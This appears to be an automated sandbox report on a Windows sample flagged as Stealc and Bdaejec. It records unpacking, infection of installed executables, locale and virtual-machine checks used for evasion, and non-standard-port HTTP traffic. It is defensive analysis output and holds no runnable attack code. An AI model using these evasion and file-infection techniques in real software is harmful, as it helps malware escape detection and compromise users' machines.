                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\7Y18r(193).exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\Desktop\7Y18r(193).exeUnpacked PE file: 0.2.7Y18r(193).exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;Iu9:EW; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeUnpacked PE file: 2.2.WuiXLS.exe.700000.1.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\7Y18r(193).exeUnpacked PE file: 0.2.7Y18r(193).exe.400000.0.unpack
                  Source: C:\Users\user\Desktop\7Y18r(193).exeCode function: 0_2_00412180 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00412180
                  Source: initial sampleStatic PE information: section where entry point is pointing to: Iu9
                  Source: 7Y18r(193).exeStatic PE information: section name: Iu9
                  Source: WuiXLS.exe.0.drStatic PE information: section name: .aspack
                  Source: WuiXLS.exe.0.drStatic PE information: section name: .adata
                  Source: Uninstall.exe.2.drStatic PE information: section name: EpNuZ
                  Source: MyProg.exe.2.drStatic PE information: section name: PELIB
                  Source: MyProg.exe.2.drStatic PE information: section name: Y|uR
                  Source: SciTE.exe.2.drStatic PE information: section name: u
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeCode function: 2_2_00701638 push dword ptr [00703084h]; ret 2_2_0070170E
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeCode function: 2_2_00706014 push 007014E1h; ret 2_2_00706425
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeCode function: 2_2_00702D9B push ecx; ret 2_2_00702DAB
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeCode function: 2_2_0070600A push ebp; ret 2_2_0070600D
                  Source: 7Y18r(193).exeStatic PE information: section name: Iu9 entropy: 6.934398937344117
                  Source: WuiXLS.exe.0.drStatic PE information: section name: .text entropy: 7.81169422100848
                  Source: Uninstall.exe.2.drStatic PE information: section name: EpNuZ entropy: 6.933404246102348
                  Source: MyProg.exe.2.drStatic PE information: section name: Y|uR entropy: 6.934452551344648
                  Source: SciTE.exe.2.drStatic PE information: section name: u entropy: 6.934015882933062

                  Persistence and Installation Behavior

                  barindex
                  Infects executable files (exe, dll, sys, html)
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
                  Source: C:\Users\user\Desktop\7Y18r(193).exeFile created: C:\Users\user\AppData\Local\Temp\WuiXLS.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Uses known network protocols on non-standard ports
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 799
                  Source: C:\Users\user\Desktop\7Y18r(193).exeCode function: 0_2_00412180 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00412180
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Found evasive API chain (may stop execution after checking locale)
                  Source: C:\Users\user\Desktop\7Y18r(193).exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-17852
                  Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                  Source: C:\Users\user\Desktop\7Y18r(193).exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-17833
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_2-1312
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_2-1053
                  Source: C:\Users\user\Desktop\7Y18r(193).exeAPI coverage: 5.5 %
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeCode function: 2_2_00701718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00701754h2_2_00701718
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeCode function: 2_2_007029E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,2_2_007029E2
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeCode function: 2_2_00702B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,2_2_00702B8C
                  Source: C:\Users\user\Desktop\7Y18r(193).exeCode function: 0_2_00401100 GetSystemInfo,ExitProcess,0_2_00401100
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
                  Source: Amcache.hve.6.drBinary or memory string: VMware
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                  Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                  Source: WuiXLS.exe, 00000002.00000002.1505404095.00000000005BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnj
                  Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: WuiXLS.exe, 00000002.00000002.1505404095.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, WuiXLS.exe, 00000002.00000002.1505404095.000000000061F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: 7Y18r(193).exe, 00000000.00000002.1511509261.0000000000885000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                  Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\Desktop\7Y18r(193).exeAPI call chain: ExitProcess graph end nodegraph_0-17837
                  Source: C:\Users\user\Desktop\7Y18r(193).exeAPI call chain: ExitProcess graph end nodegraph_0-17840
                  Source: C:\Users\user\Desktop\7Y18r(193).exeAPI call chain: ExitProcess graph end nodegraph_0-17691
                  Source: C:\Users\user\Desktop\7Y18r(193).exeAPI call chain: ExitProcess graph end nodegraph_0-17678
                  Source: C:\Users\user\Desktop\7Y18r(193).exeAPI call chain: ExitProcess graph end nodegraph_0-17858
                  Source: C:\Users\user\Desktop\7Y18r(193).exeAPI call chain: ExitProcess graph end nodegraph_0-17851
                  Source: C:\Users\user\Desktop\7Y18r(193).exeAPI call chain: ExitProcess graph end nodegraph_0-17855
                  Source: C:\Users\user\Desktop\7Y18r(193).exeAPI call chain: ExitProcess graph end nodegraph_0-18853
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeAPI call chain: ExitProcess graph end nodegraph_2-1028
                  Source: C:\Users\user\Desktop\7Y18r(193).exeCode function: 0_2_00412180 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00412180
                  Source: C:\Users\user\Desktop\7Y18r(193).exeCode function: 0_2_00401240 mov eax, dword ptr fs:[00000030h]0_2_00401240
                  Source: C:\Users\user\Desktop\7Y18r(193).exeCode function: 0_2_00412070 mov eax, dword ptr fs:[00000030h]0_2_00412070
                  Source: C:\Users\user\Desktop\7Y18r(193).exeCode function: 0_2_007BA044 mov eax, dword ptr fs:[00000030h]0_2_007BA044
                  Source: C:\Users\user\Desktop\7Y18r(193).exeCode function: 0_2_008914A7 mov eax, dword ptr fs:[00000030h]0_2_008914A7
                  Source: C:\Users\user\Desktop\7Y18r(193).exeCode function: 0_2_008A22D7 mov eax, dword ptr fs:[00000030h]0_2_008A22D7
                  Source: C:\Users\user\Desktop\7Y18r(193).exeCode function: 0_2_00890D90 mov eax, dword ptr fs:[00000030h]0_2_00890D90
                  Source: C:\Users\user\Desktop\7Y18r(193).exeCode function: 0_2_0089092B mov eax, dword ptr fs:[00000030h]0_2_0089092B
                  Source: C:\Users\user\Desktop\7Y18r(193).exeCode function: 0_2_008E5654 push dword ptr fs:[00000030h]0_2_008E5654
                  Source: C:\Users\user\Desktop\7Y18r(193).exeCode function: 0_2_004107D0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_004107D0
                  Source: SciTE.exe.2.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
                  Source: C:\Users\user\Desktop\7Y18r(193).exeCode function: 0_2_00410360 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00410360
                  Source: C:\Users\user\Desktop\7Y18r(193).exeCode function: 0_2_00410790 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00410790
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeCode function: 2_2_0070139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,2_2_0070139F
                  Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Bdaejec
                  Source: Yara matchFile source: Process Memory Space: WuiXLS.exe PID: 7496, type: MEMORYSTR
                  Yara detected Stealc
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: Yara matchFile source: 0.3.7Y18r(193).exe.2430000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.7Y18r(193).exe.890e67.1.raw.unpack, type: UNPACKEDPE
